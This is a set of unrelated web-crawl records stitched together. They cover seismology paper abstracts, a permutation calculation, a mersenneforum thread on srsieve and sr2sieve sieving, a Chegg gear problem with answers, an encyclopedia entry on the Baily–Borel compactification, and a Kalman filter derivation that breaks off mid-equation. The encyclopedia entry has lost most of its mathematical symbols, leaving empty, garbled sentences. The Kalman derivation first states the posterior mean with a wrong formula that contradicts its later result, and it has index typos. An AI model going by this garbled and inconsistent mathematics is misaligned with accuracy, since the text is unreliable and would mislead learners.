ground motions—PGA and SA (at 0.2, 1.0 and 2.0 s) are computed using GEM’s OpenQuake and presented in form of hazard maps for 2% and 10% probabilities of exceedance in 50 years as well as mean hazard curves and uniform hazard spectra. Disaggregation for capital city Dhaka has also been carried out to show the hazard contributions of magnitude–distance pairs. The spatial distribution of PGA and SA are found remarkably higher than previous findings, likely due to differences in parameters and uncertainties. The results show a marked increase (by almost 20%) in the observed ground motions with respect to those carried out previously by uniformly characterizing the whole country as a firm rock. 更新日期:2020-01-04 • Pure Appl. Geophys. (IF 1.466) Pub Date : 2019-12-17 Ignatius Ryan Pranantyo, Phil R. Cummins We present an analysis of the oldest detailed account of tsunami run-up in Indonesia, that of the 1674 Ambon tsunami (Rumphius in Waerachtigh Verhael van de Schuckelijcke Aerdbebinge, BATAVIA, Dutch East Indies, 1675). At 100 m this is the largest run-up height ever documented in Indonesia, and with over 2300 fatalities even in 1674, it ranks as one of Indonesia’s most deadly tsunami disasters. We consider the plausible sources of earthquakes near Ambon that could generate a large, destructive tsunami, including the Seram Megathrust, the South Seram Thrust, and faults local to Ambon. We conclude that the only explanation for the extreme run-up observed on the north coast of Amon is a tsunami generated by an earthquake-triggered coastal landslide. We use a two-layer tsunami model to show that a submarine landslide, with an approximate volume of 1 km3, offshore the area on Ambon’s northern coast, between Seith and Hila, where dramatic changes in coastal landscape were observed can explain the observed tsunami run-up along the coast. Thus, the 1674 Ambon tsunami adds weight to the evidence from recent tsunamis, including the 1992 Flores, 2018 Palu and Sunda Strait tsunamis, that landslides are an important source of tsunami hazard in Indonesia. 更新日期:2020-01-04 Contents have been reproduced by permission of the publishers. down wechat bug
2020-02-17 15:31:13
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4036889970302582, "perplexity": 2925.9919130519843}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875142603.80/warc/CC-MAIN-20200217145609-20200217175609-00311.warc.gz"}
https://web2.0calc.com/questions/permutations_8
+0 # ​ Permutations... 0 203 1 Guest Jul 9, 2017 #1 +7053 +2 You can put it into the calculator on the home page like this:    npr(12,9) But if you don't have a calculator that can do this..... $$_nP_r=\frac{n!}{(n-r)!} \\~\\ _{12}P_9=\frac{12!}{(12-9)!} \\~\\ _{12}P_9=\frac{12!}{3!} \\~\\ _{12}P_9=\frac{12\,\cdot\,11\,\cdot\,10\,\cdot\,9\,\cdot\,8\,\cdot\,7\,\cdot\,6\,\cdot\,5\,\cdot\,4\,\cdot\,3!}{3!} \\~\\ _{12}P_9=12\,\cdot\,11\,\cdot\,10\,\cdot\,9\,\cdot\,8\,\cdot\,7\,\cdot\,6\,\cdot\,5\,\cdot\,4 \\~\\ _{12}P_9=79,833,600$$ hectictar  Jul 9, 2017 Sort: #1 +7053 +2 You can put it into the calculator on the home page like this:    npr(12,9) But if you don't have a calculator that can do this..... $$_nP_r=\frac{n!}{(n-r)!} \\~\\ _{12}P_9=\frac{12!}{(12-9)!} \\~\\ _{12}P_9=\frac{12!}{3!} \\~\\ _{12}P_9=\frac{12\,\cdot\,11\,\cdot\,10\,\cdot\,9\,\cdot\,8\,\cdot\,7\,\cdot\,6\,\cdot\,5\,\cdot\,4\,\cdot\,3!}{3!} \\~\\ _{12}P_9=12\,\cdot\,11\,\cdot\,10\,\cdot\,9\,\cdot\,8\,\cdot\,7\,\cdot\,6\,\cdot\,5\,\cdot\,4 \\~\\ _{12}P_9=79,833,600$$ hectictar  Jul 9, 2017
2018-05-23 20:52:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.949414849281311, "perplexity": 1645.9194036111933}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794865809.59/warc/CC-MAIN-20180523200115-20180523220115-00063.warc.gz"}
https://www.mersenneforum.org/showthread.php?s=461be43cde549bf61c66f1275d30570c&t=9996&page=2
mersenneforum.org Help needed for doublecheck sieving! User Name Remember Me? Password Register FAQ Search Today's Posts Mark Forums Read 2008-02-17, 00:41   #12 mdettweiler A Sunny Moo Aug 2007 USA (GMT-5) 3·2,083 Posts Quote: Originally Posted by AES Is there a reason you're not using sr2sieve? I'll take 30e9 to 50e9 srsieve is generally faster when you have more than 60-70 k's in the sieve. Thanks for helping out! 2008-02-17, 00:58 #13 AES   Jul 2007 Tennessee 25·19 Posts You may want test it on this sieve. I have similar hardware and with sr2... 64-bit will do 10e9 in less than 10 hours 32-bit will do 10e9 in less than 16 hours 2008-02-17, 01:24   #14 mdettweiler A Sunny Moo Aug 2007 USA (GMT-5) 3·2,083 Posts Quote: Originally Posted by AES You may want test it on this sieve. I have similar hardware and with sr2... 64-bit will do 10e9 in less than 10 hours 32-bit will do 10e9 in less than 16 hours Hmm. Okay, I'll check it out. In the meantime, feel free to use either srsieve or sr2sieve, whichever one you find faster--they both produce compatible results, so it won't make any difference on my end. 2008-02-17, 07:31 #15 gd_barnes     May 2007 Kansas; USA 5·2,017 Posts It is possible that sr2sieve is now faster with 351 k's like this. It may also depend on the type of machine your using. When I started the huge sieve for 400 2x n-min, it's a little more efficient to break off a large chunk while continuing to sieve the higher n-ranges but personally, I don't think it's worth messing with at these lower n-ranges. In the mean time, Anon, can you run an LLR test on your machine for a candidate around n=212K? That'll give a removal rate to shoot for on a comparable machine. After 300 2008-02-17, 13:40 #16 Flatlander I quite division it     "Chris" Feb 2005 England 207710 Posts To use sr2sieve do I just download it and change "srsieve" in the .bat file? Last fiddled with by Flatlander on 2008-02-17 at 13:41 2008-02-17, 14:29   #17 mdettweiler A Sunny Moo Aug 2007 USA (GMT-5) 3×2,083 Posts Quote: Originally Posted by Flatlander To use sr2sieve do I just download it and change "srsieve" in the .bat file? No, its command line switches are a little different. Your .bat file will need to look like this: Code: sr2sieve -p 10e9 -P 20e9 -i nplb-doublecheck-sieve_10G.txt Other than that, it's pretty much the same. Last fiddled with by mdettweiler on 2008-02-17 at 14:29 2008-02-17, 14:33   #18 mdettweiler A Sunny Moo Aug 2007 USA (GMT-5) 11000011010012 Posts Quote: Originally Posted by gd_barnes It is possible that sr2sieve is now faster with 351 k's like this. It may also depend on the type of machine your using. When I started the huge sieve for 400 I'll try that sometime today. Quote: Originally Posted by gd_barnes BTW, the estimated optimum of 550G was an 'extraploted' guess. It assumed that an LLR test of a candidate at n=212K (70% of the n-range of n=100K-260K) took 60 secs. and it took into account the removal rate that Anon was getting on his machine at P=~19G. I didn't actually run the test. Anon or whomever, as we get past P=~200G, we'll see if we can nail down a better estimated optimum sieve depth. Technically with n-max being > 2x n-min, it's a little more efficient to break off a large chunk while continuing to sieve the higher n-ranges but personally, I don't think it's worth messing with at these lower n-ranges. In the mean time, Anon, can you run an LLR test on your machine for a candidate around n=212K? That'll give a removal rate to shoot for on a comparable machine. Okay, I'll do that soon. Quote: Originally Posted by gd_barnes After 300 Okay, cool. Anon Last fiddled with by mdettweiler on 2008-02-17 at 14:33 2008-02-17, 18:13 #19 Flatlander I quite division it     "Chris" Feb 2005 England 40358 Posts 20G-30G finished. Taking 50G-70G. srsieve 130,000 p/sec (20G-30G) sr2sieve 230,000 p/sec (50G-70G) Last fiddled with by Flatlander on 2008-02-17 at 18:30 2008-02-17, 18:49   #20 mdettweiler A Sunny Moo Aug 2007 USA (GMT-5) 186916 Posts Quote: Originally Posted by Flatlander 20G-30G finished. Taking 50G-70G. srsieve 130,000 p/sec (20G-30G) sr2sieve 230,000 p/sec (50G-70G) Oh, wow! I'll change the instructions in the first post so that they tell people to use sr2sieve. I'll also update the sieve file archive to include the updated batch file and shell script. 2008-02-17, 19:05 #21 mdettweiler A Sunny Moo     Aug 2007 USA (GMT-5) 624910 Posts Okay, I updated the first post in this thread to reflect the change to sr2sieve. The instructions are significantly different, so you'll want to read them again. 2008-02-17, 20:24   #22 Flatlander I quite division it "Chris" Feb 2005 England 31·67 Posts I'm already running this: Quote: sr2sieve -p 50e9 -P 70e9 -i nplb-doublecheck-sieve_10G.txt is that ok? Similar Threads Thread Thread Starter Forum Replies Last Post jasong jasong 4 2012-03-25 19:11 ATH PrimeNet 11 2010-06-03 06:38 masser Sierpinski/Riesel Base 5 44 2006-09-24 17:19 Unregistered PrimeNet 9 2006-03-26 05:48 TheJudger Data 4 2005-04-04 08:54 All times are UTC. The time now is 10:38. Tue Mar 31 10:38:15 UTC 2020 up 6 days, 8:11, 0 users, load averages: 1.31, 1.31, 1.20
2020-03-31 10:38:16
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.34169942140579224, "perplexity": 12401.689178503355}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370500426.22/warc/CC-MAIN-20200331084941-20200331114941-00332.warc.gz"}
http://www.chegg.com/homework-help/questions-and-answers/gears-importantcomponents-mechanical-devices-mechanical-clocks-tobicycles-fact-present-mot-q145443
## A Simple Gear System Gears are importantcomponents in many mechanical devices, from mechanical clocks tobicycles. In fact, they are present whenever a motor producesrotational motion. An example of a simple gear system is shown in the figure.   The bigger wheel (wheel 1) hasradius , while the smaller one (wheel 2) has radius . The two wheels have small teeth and are connectedthrough a metal chain so that when wheel 1 rotates, the chain moveswith it and causes wheel 2 to rotate as well. Part A Let wheel 1 rotate at a constant angularspeed . Find the ratio of the angular speed of wheel 1 to the angularspeed of wheel 2. Express your answer in terms of anyor all of the variables and . = Part B The rotation of wheel 1 is caused by a torque. Find the ratio of the torque acting on wheel 1 to the torqueacting on wheel 2. Express your answer in terms of anyor all of the variables and . = Part C If the power needed to rotate wheel 1 is, what is the ratio of the power of wheel 1 to the power of wheel2? Express your answer in terms of anyor all of the variables and . = • partA: r2/r1 partB: r1/r2 partC: 1 partD: 15.0 partE: The torque exerted on the rear gear wheel increases.
2013-05-25 09:01:08
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8015581965446472, "perplexity": 2114.6873878448896}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368705884968/warc/CC-MAIN-20130516120444-00093-ip-10-60-113-184.ec2.internal.warc.gz"}
http://www.encyclopediaofmath.org/index.php/Baily%e2%80%93Borel_compactification
# Baily-Borel compactification Satake–Baily–Borel compactification Let be a semi-simple linear algebraic group (cf. also Semi-simple algebraic group) defined over , meaning that can be embedded as a subgroup of such that each element is diagonalizable (cf. also Diagonalizable algebraic group), and that the equations defining as an algebraic variety have coefficients in (and that the group operation is an algebraic morphism). Further, suppose contains a torus (cf. Algebraic torus) that splits over (i.e., has -rank at least one), and is of Hermitian type, so that can be given a complex structure with which it becomes a symmetric domain, where denotes the real points of and is a maximal compact subgroup. Finally, let be an arithmetic subgroup (cf. Arithmetic group) of , commensurable with the integer points of . Then the arithmetic quotient is a normal analytic space whose Baily–Borel compactification, also sometimes called the Satake–Baily–Borel compactification, is a canonically determined projective normal algebraic variety , defined over , in which is Zariski-open (cf. also Zariski topology) [a1] [a2] [a15] [a16]. To describe in the complex topology, first note that the Harish–Chandra realization [a6] of as a bounded symmetric domain may be compactified by taking its topological closure. Then a rational boundary component of is a boundary component whose stabilizer in is defined over ; based on a detailed analysis of the -roots and -roots of , there is a natural bijection between the rational boundary components of and the proper maximal parabolic subgroups of defined over . Let denote the union of with all its rational boundary components. Then (cf. [a18]) there is a unique topology, the Satake topology, on such that the action of extends continuously and with its quotient topology compact and Hausdorff. It also follows from the construction that is a finite disjoint union of the form where for some rational boundary component of , and is the intersection of with the stabilizer of . In addition, and each has a natural structure as a normal analytic space; the closure of any is the union of with some s of strictly smaller dimension; and it can be proved that every point has a fundamental system of neighbourhoods such that is connected for every . In order to describe the structure sheaf of (cf. also Scheme) with which it becomes a normal analytic space and a projective variety, define an -function on an open subset to be a continuous complex-valued function on whose restriction to is analytic, , where . Then, associating to each open the -module of -functions on determines the sheaf of germs of -functions. Further, for each the sheaf of germs of restrictions of -functions to is the structure sheaf of . Ultimately it is proved [a2] that is a normal analytic space which can be embedded in some complex projective space as a projective, normal algebraic variety. The proof of this last statement depends on exhibiting that in the collection of -functions there are enough automorphic forms for , more specifically, Poincaré-Eisenstein series, which generalize both Poincaré series and Eisenstein series (cf. also Theta-series), to separate points on as well as to provide a projective embedding. ## Contents ### History and examples. The simplest example of a Baily–Borel compactification is when , and , and is the complex upper half-plane, on which in acts by . (The bounded realization of is a unit disc, to which the upper half-plane maps by .) The properly discontinuous action of on extends to , and is a smooth projective curve. Since has -rank one, is a finite set of points, referred to as cusps. Historically the next significant example was for the Siegel modular group, with , and , and consisting of symmetric complex matrices with positive-definite imaginary part; here in acts on by . I. Satake [a17] was the first to describe a compactification of as endowed with its Satake topology (cf. also Satake compactification). Then Satake, H. Cartan and others (in [a19]) and W.L. Baily [a13] further investigated and exhibited the analytic and algebraic structure of , using automorphic forms as mentioned above. Baily [a14] also treated the Hilbert–Siegel modular group, where for a totally real number field . In the meanwhile, under only some mild assumption about , Satake [a18] constructed with its Satake topology, while I.I. Piateckii-Shapiro [a10] described a normal analytic compactification whose topology was apparently weaker than that of the Baily–Borel compactification. Later, P. Kiernan [a7] showed that the topology defined by Piateckii-Shapiro is homeomorphic to the Satake topology used by Baily and Borel. ### Other compactifications. Other approaches to the compactification of arithmetic quotients of symmetric domains to which the Satake and Baily–Borel approach may be compared are the Borel–Serre compactification [a3], see the discussion in [a20], and the method of toroidal embeddings [a12]. ### Cohomology. Zucker's conjecture [a21] that the (middle perversity) intersection cohomology [a4] (cf. also Intersection homology) of the Baily–Borel compactification coincides with its -cohomology, has been given two independent proofs (see [a8] and [a11]); see also the discussion and bibliography in [a5]. ### Arithmetic and moduli. In many cases has an interpretation as the moduli space for some family of Abelian varieties (cf. also Moduli theory), usually with some additional structure; this leads to the subject of Shimura varieties (cf. also Shimura variety), which also addresses arithmetic questions such as the field of definition of and . Geometrically, the strata of parameterize different semi-Abelian varieties, i.e., semi-direct products of algebraic tori with Abelian varieties, into which the Abelian varieties represented by points on degenerate. For an example see [a9], where this is thoroughly worked out for -forms of , especially for . #### References [a1] W.L. Baily, Jr., A. Borel, "On the compactification of arithmetically defined quotients of bounded symmetric domains" Bull. Amer. Math. Soc. , 70 (1964) pp. 588–593 [a2] W.L. Baily, Jr., A. Borel, "Compactification of arithmetic quotients of bounded symmetric domains" Ann. of Math. (2) , 84 (1966) pp. 442–528 [a3] A. Borel, J.P. Serre, "Corners and arithmetic groups" Comment. Math. Helv. , 48 (1973) pp. 436–491 [a4] M. Goresky, R. MacPherson, "Intersection homology, II" Invent. Math. , 72 (1983) pp. 135–162 [a5] M. Goresky, "-cohomology is intersection cohomology" R.P. Langlands (ed.) D. Ramakrishnan (ed.) , The Zeta Functions of Picard Modular Surfaces , Publ. CRM (1992) pp. 47–63 [a6] Harish-Chandra, "Representations of semi-simple Lie groups. VI" Amer. J. Math. , 78 (1956) pp. 564–628 [a7] P. Kiernan, "On the compactifications of arithmetic quotients of symmetric spaces" Bull. Amer. Math. Soc. , 80 (1974) pp. 109–110 [a8] E. Looijenga, "-cohomology of locally symmetric varieties" Computers Math. , 67 (1988) pp. 3–20 [a9] "The zeta functions of Picard modular surfaces" R.P. Langlands (ed.) D. Ramakrishnan (ed.) , Publ. CRM (1992) [a10] I.I. Piateckii-Shapiro, "Arithmetic groups in complex domains" Russian Math. Surveys , 19 (1964) pp. 83–109 Uspekhi Mat. Nauk. , 19 (1964) pp. 93–121 [a11] L. Saper, M. Stern, "-cohomology of arithmetic varieties" Ann. of Math. , 132 : 2 (1990) pp. 1–69 [a12] A. Ash, D. Mumford, M. Rapoport, Y. Tai, "Smooth compactifications of locally symmetric varieties" , Math. Sci. Press (1975) [a13] W.L. Baily, Jr., "On Satake's compactification of " Amer. J. Math. , 80 (1958) pp. 348–364 [a14] W.L. Baily, Jr., "On the Hilbert–Siegel modular space" Amer. J. Math. , 81 (1959) pp. 846–874 [a15] W.L. Baily, Jr., "On the orbit spaces of arithmetic groups" , Arithmetical Algebraic Geometry (Proc. Conf. Purdue Univ., 1963) , Harper and Row (1965) pp. 4–10 [a16] W.L. Baily, Jr., "On compactifications of orbit spaces of arithmetic discontinuous groups acting on bounded symmetric domains" , Algebraic Groups and Discontinuous Subgroups , Proc. Symp. Pure Math. , 9 , Amer. Math. Soc. (1966) pp. 281–295 [a17] I. Satake, "On the compactification of the Siegel space" J. Indian Math. Soc. (N.S.) , 20 (1956) pp. 259–281 MR0084842 Zbl 0072.30002 [a18] I. Satake, "On compactifications of the quotient spaces for arithmetically defined discontinuous groups" Ann. of Math. , 72 : 2 (1960) pp. 555–580 MR0170356 Zbl 0146.04701 [a19] "Fonctions automorphes" , Sém. H. Cartan 10ième ann. (1957/8) , 1–2 , Secr. Math. Paris (1958) (Cartan) [a20] S. Zucker, "Satake compactifications" Comment. Math. Helv. , 58 (1983) pp. 312–343 MR0705539 Zbl 0565.22009 [a21] S. Zucker, "-cohomology of warped products and arithmetic groups" Ann. of Math. , 70 (1982) pp. 169–218 MR0684171 Zbl 0508.20020 How to Cite This Entry: Baily–Borel compactification. Encyclopedia of Mathematics. URL: http://www.encyclopediaofmath.org/index.php?title=Baily%E2%80%93Borel_compactification&oldid=23760
2013-05-22 04:47:18
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9395282864570618, "perplexity": 1385.7286984502982}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368701314683/warc/CC-MAIN-20130516104834-00076-ip-10-60-113-184.ec2.internal.warc.gz"}
https://biro.ai/kf-derivation/
# Deriving the Kalman Filter October 05, 2020 Mark Liu ## Intro Let’s use the random vector $x$ to represent an uncertain state, and the random vector $z$ to represent an uncertain measurement. Even before making any actual measurements, we should have prior idea of the likelihoods of different values of the combined vector $\begin{bmatrix} x\\ z \end{bmatrix}$. These are subjective assessments of the following sort. • The value of $x$ is probably close to the known vector $a$ • The value of $z$ will probably turn out to be close to the known vector $b$ • The value of $z$ is probably close to $F x$, where $F$ is a known matrix To encode these prior subjective beliefs numerically, we can say that $\begin{bmatrix} x\\ z \end{bmatrix}$ is distributed as a Gaussian random variable. $\begin{bmatrix} x\\ z \end{bmatrix} \sim N(\begin{bmatrix} \mu_x\\ \mu_z \end{bmatrix}, \begin{bmatrix} \Sigma_{xx} & \Sigma_{xz}\\ \Sigma_{zx} & \Sigma_{zz} \end{bmatrix})$ • $\Sigma_{xx}$ describes how close we believe $x$ is to $\mu_x$. • $\Sigma_{zz}$ describes how close we believe $z$ will be to $\mu_z$. • $\Sigma_{xz} = \Sigma_{zx}^T$ describes how correlated we think $z$ and $x$ are. The Kalman Filter can be viewed as a principled way to choose $\mu_x \, \mu_z \, \Sigma_{xx} \, \Sigma_{xz} \, \Sigma_{zx} \, \Sigma_{zz}$. There are also other ways to choose these priors, but suppose for now that we have chosen them sensibly. Now that we have a prior $p(x,z)$, we can incorporate any measurement $z_0$ into the state by simply taking the posterior estimate $p(x|z=z_0)$. We will find in the next section that the posterior is $x|z=z_0$ distributed as a Gaussian with the following parameters. $\mu_{x|z=z_0} = \mu_x + \Sigma_{xx}\Sigma_{xz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ I will call these the equations the Bayes Inference equations. ## Deriving the Bayes Inference Equations In this section I’ll derive the Bayes inference equations. $\mu_{x|z=z_0} = \mu_x + \Sigma_{xx}\Sigma_{xz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ Feel free to come back to this section later if you’re willing to take these equations on faith for now. We have the proportionality relationship $p(x|z=z_0) = \frac {p(x, z_0)} {p(z_0)}\propto p(x,z_0)$. This means only have to evaluate the right hand side $p(x,z_0)$ in order to know the distribution $p(x|z=z_0)$. Remember the Gaussian density, where $K$ represents a constant of integration that we don’t care about. $p(x,z) = K\exp(-\frac{1}{2}\begin{bmatrix} x - \mu_x\\ z - \mu_z\end{bmatrix} ^T\begin{bmatrix} \Sigma_{xx} & \Sigma_{xz}\\ \Sigma_{zx} & \Sigma_{zz} \end{bmatrix}^{-1}\begin{bmatrix} x - \mu_x\\ z - \mu_z \end{bmatrix})$ It will be convenient to use the inverse covariance matrix, also known as the information matrix. $\begin{bmatrix} \Lambda_{xx} & \Lambda_{xz}\\ \Lambda_{zx} & \Lambda_{zz} \end{bmatrix}\equiv \begin{bmatrix} \Sigma_{xx} & \Sigma_{xz}\\ \Sigma_{zx} & \Sigma_{zz} \end{bmatrix}^{-1}$ We can substitute the information matrix and expand. $p(x,z) = K\exp(-\frac{1}{2}\begin{bmatrix} x\\ z \end{bmatrix}^T\begin{bmatrix} \Lambda_{xx} & \Lambda_{xz}\\ \Lambda_{zx} & \Lambda_{zz} \end{bmatrix}\begin{bmatrix} x\\ z \end{bmatrix} + \begin{bmatrix} x\\ z \end{bmatrix}^T \begin{bmatrix} \Lambda_{xx} & \Lambda_{xz}\\ \Lambda_{zx} & \Lambda_{zz} \end{bmatrix}\begin{bmatrix} \mu_x\\ \mu_z \end{bmatrix} )$ Then substitute $z = z_0$ and expand more. We can collect any terms that are not multiplied by $x$ into a constant $C$. $p(x,z_0) = K\exp(-\frac{1}{2}x^T\Lambda_{xx}x - x^T\Lambda_{xy}z_0 + x^T \Lambda_{xx} \mu_x + x^T\Lambda_{xz}\mu_z + C)$ The $C$ and $K$ both drop out as scaling constants. $p(x,z_0) \propto \exp(-\frac{1}{2}x^T\Lambda_{xx}x - x^T\Lambda_{xy}z_0 + x^T \Lambda_{xx} \mu_x + x^T\Lambda_{xz}\mu_z)$ $p(x,z_0) \propto \exp(-\frac{1}{2}x^T\Lambda_{xx}x + x^T(\Lambda_{xx} \mu_x - \Lambda_{xz}(z_0 - \mu_z))$ Complete the square by first by rewriting $\Lambda_{xx} \mu_x - \Lambda_{zz}(z_0 - \mu_z) \rightarrow \Lambda_{xx} (\mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z))$ $p(x,z_0) \propto \exp(-\frac{1}{2}x^T\Lambda_{xx}x + x^T\Lambda_{xx} (\mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z)))$ $p(x,z_0) \propto \exp(-\frac{1}{2} (x - (\mu_x - \Lambda_{xx}^{-1}\Lambda_{zz}(z_0 - \mu_z)))^T\Lambda_{xx}(x - (\mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z))))$ Note that this is the probability density of a Gaussian with mean $\mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z)$ and covariance $\Lambda_{xx}^{-1}$. $\mu_{x|z=z_0} = \mu_x - \Lambda_{xx}^{-1}\Lambda_{xz}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} = \Lambda_{xx}^{-1}$ This formula is written in terms of the information matrix, but in many cases it is more convenient to write it in terms of the covariance matrix. To accomplish this, we can use the block-matrix inversion formula where $\Sigma/\Sigma_{zz}$ is the Schur complement $\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$. $\begin{bmatrix} \Lambda_{xx} & \Lambda_{xz}\\ \Lambda_{zx} & \Lambda_{zz} \end{bmatrix} = \begin{bmatrix} \Sigma_{xx} & \Sigma_{xz}\\ \Sigma_{zx} & \Sigma_{zz} \end{bmatrix}^{-1} = \begin{bmatrix} (\Sigma/\Sigma_{zz})^{-1} & - (\Sigma/\Sigma_{zz})^{-1}\Sigma_{xz}\Sigma_{zz}^{-1} \\ \Sigma_{zz}^{-1}\Sigma_{zx}(\Sigma/\Sigma_{zz})^{-1} & \Sigma_{zz}^{-1} + \Sigma_{zz}^{-1}\Sigma_{zx} (\Sigma/\Sigma_{zz})^{-1}\Sigma_{xz}\Sigma_{zz}^{-1}\end{bmatrix}$ We see that $\Lambda_{xx}^{-1} = \Sigma/\Sigma_{zz}$ and $-\Lambda_{xx}^{-1} \Lambda_{xz} = \Sigma_{xx}\Sigma_{xz}^{-1}$. Therefore we can write the distribution of $x|_{z=z_0}$ in terms of the covariance matrix. $\mu_{x|z=z_0} = \mu_x + \Sigma_{xz}\Sigma_{zz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ ## Deriving the Kalman Filter In the first section, I mentioned that the Kalman Filter can be seen as a principled way to establish the priors $\mu_x, \, \mu_z, \, \Sigma_{xx}, \, \Sigma_{zz},\, \Sigma_{xz}$. Remember we wanted these priors so that, given an actual measurement $z_0$, we could apply the Bayes inference equations. $\mu_{x|z=z_0} = \mu_x + \Sigma_{xz}\Sigma_{zz}^{-1}(z_0 - \mu_z)$ $\Sigma_{x|z=z_0} =\Sigma_{xx} - \Sigma_{xz}\Sigma_{zz}^{-1}\Sigma_{zx}$ The Kalman Filter sets up $\mu_x, \, \mu_z, \, \Sigma_{xx}, \, \Sigma_{zz},\, \Sigma_{xz}$ by supposing that the state variable $x$ and the measurement variable $z$ are both caused by a single prior variable $x_0 \sim N(\mu_{x_0}, \Sigma_{x_0})$, via a state-update matrix $F$, and a measurement matrix $H$. With $w \sim N(0, \Sigma_w)$ as independent process noise, we assume our state $x$ arises from $x_0$ follows. $x = F x_0 + w$ With $v \sim N(0, \Sigma_v)$ as independent measurement error, we assume our measurement $z$ arises from $x$ (and ultimately from $x_0$) as follows. $z = Hx + v$ These two equations are enough to generate the list $\mu_x, \, \mu_z, \, \Sigma_{xx}, \, \Sigma_{zz},\, \Sigma_{xz}$ via straightforward computations. See the next section for those derivations in detail. We will end up with the following. $\mu_x = F\mu_{x_0}$ $\mu_z = HF\mu_{x_0}$ $\Sigma_{xx} =F\Sigma_{x_0}F^T + 